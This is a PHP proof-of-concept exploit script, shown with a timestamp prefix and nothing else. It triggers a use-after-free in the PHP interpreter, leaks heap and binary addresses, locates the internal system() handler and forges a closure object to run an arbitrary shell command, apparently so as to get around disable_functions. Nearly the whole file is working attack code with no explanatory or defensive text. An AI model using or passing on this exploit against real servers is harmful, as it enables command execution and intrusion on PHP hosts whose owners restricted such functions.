@ 2020-10-28T03:13:18Z <?php
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper;
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
$str_2 = substr(str_shuffle(str_repeat('A', 79)), 0);
$array_process_3 = array("str_2" => &$str_2, "arg_2" => &$str_2);
$array_process_3 = array_merge_recursive($array_process_3, $array_process_3);
$array_process_3 = null;
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$abc = $str_2;
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
printf("[*] closure handlers address is 0x%x <br>", $closure_handlers);
printf("[*] libphp base address is 0x%x <br>", $base);
printf("[*] abc address is 0x%x <br>", $abc_addr);
($helper->b)($cmd);
exit();
}